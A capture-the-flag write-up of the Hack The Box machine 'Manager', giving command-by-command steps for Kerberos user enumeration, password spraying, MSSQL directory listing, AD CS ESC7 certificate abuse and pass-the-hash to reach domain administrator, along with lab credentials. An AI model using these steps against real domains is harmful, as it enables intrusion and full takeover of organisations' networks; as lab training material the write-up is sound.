ManagerJanuary 25, 2026 Created by Page Difficulty OS Geiseric Hack The Box Medium Windows Enumeration I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports nmap -p- --open --min-rate 5000 -Pn -sS 10.129.4.145 -oG scan /opt/extractports scan nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49693,49694,49695,49728,49737 -Pn -sCV 10.129.4.145 -oN ports I found the domain manager.htb and I add it to the file in the hosts file. User enumeration I enumerated valid domain users using Kerberos pre-authentication checks: ./kerbrute userenum --dc 10.129.4.145 -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt This returned the following valid users ryan cheng raven administrator operator I then tested whether any users were using their username as password netexec smb 10.129.4.145 -u usernames -p usernames This revealed that the user operator was using operator:operator as credentials Initial Access – Operator Using the valid credentials, I enumerated domain information via SMB: netexec smb 10.129.4.145 -u operator -p operator --rid-brute I also collected Active Directory data for BloodHound analysis netexec ldap 10.129.4.145 -u operator -p operator --bloodhound --collection All --dns-server 10.129.4.145 From the BloodHound data, I observed that raven was the only user belonging to the Remote Management Users group, making it a high-value target. MSSQL Enumeration I authenticated to the MSSQL service using Windows authentication impacket-mssqlclient manager/operator:operator@10.129.4.145 -windows-auth No interesting databases or direct command execution paths were available. However, I was able to enumerate directories on the system using xp_dirtree EXEC master..xp_dirtree 'C:\', 1, 1; Since a web service was exposed, I listed the IIS web root: EXEC master..xp_dirtree 'C:\inetpub\wwwroot', 1, 1; This revealed a backup file named website-backup-27-07-23-old.zip I downloaded the file via HTTP and extracted it locally. Inside, I found an .old-config.xml file containing credentials for the user raven. I validated the credentials: netexec smb 10.129.4.145 -u Raven -p 'R4v3nBe5tD3veloP3r!123' User Access – Raven Using the recovered credentials, I authenticated via WinRM and obtained the user flag evil-winrm -i 10.129.4.145 -u Raven -p 'R4v3nBe5tD3veloP3r!123' Privilege Escalation I enumerated AD CS misconfigurations using Certipy certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.4.145 -stdout -enabled -vulnerable The domain was vulnerable to ESC7. Since this was not clearly visible in my existing BloodHound data, I collected additional information using SharpHound .\SharpHound.exe -c All --zipfilename info --ldapusername raven --ldappassword 'R4v3nBe5tD3veloP3r!123' ESC7 Exploitation I followed the post attack path for ESC7. First, I updated Certipy to a version that supports this attack. Then I grant certificate officer rights and request a certificate with Arbitrary UPN. certipy ca -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -add-officer raven certipy req -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -template SubCA -upn Administrator Then I retrive the certificate certipy ca -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -issue-request 25 certipy req -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -retrieve 25 This produced an **Administrator certificate administrator.pfx Administrator Compromise Using the certificate, I authenticated as Administrator and obtained the NT hash: certipy auth -pfx administrator.pfx -domain manager.htb With the NT hash, I performed a Pass-the-Hash attack and obtained a privileged shell evil-winrm -i 10.129.4.212 -u Administrator -H XXXXXXXXX This granted full administrative access and allowed me to retrieve the root flag.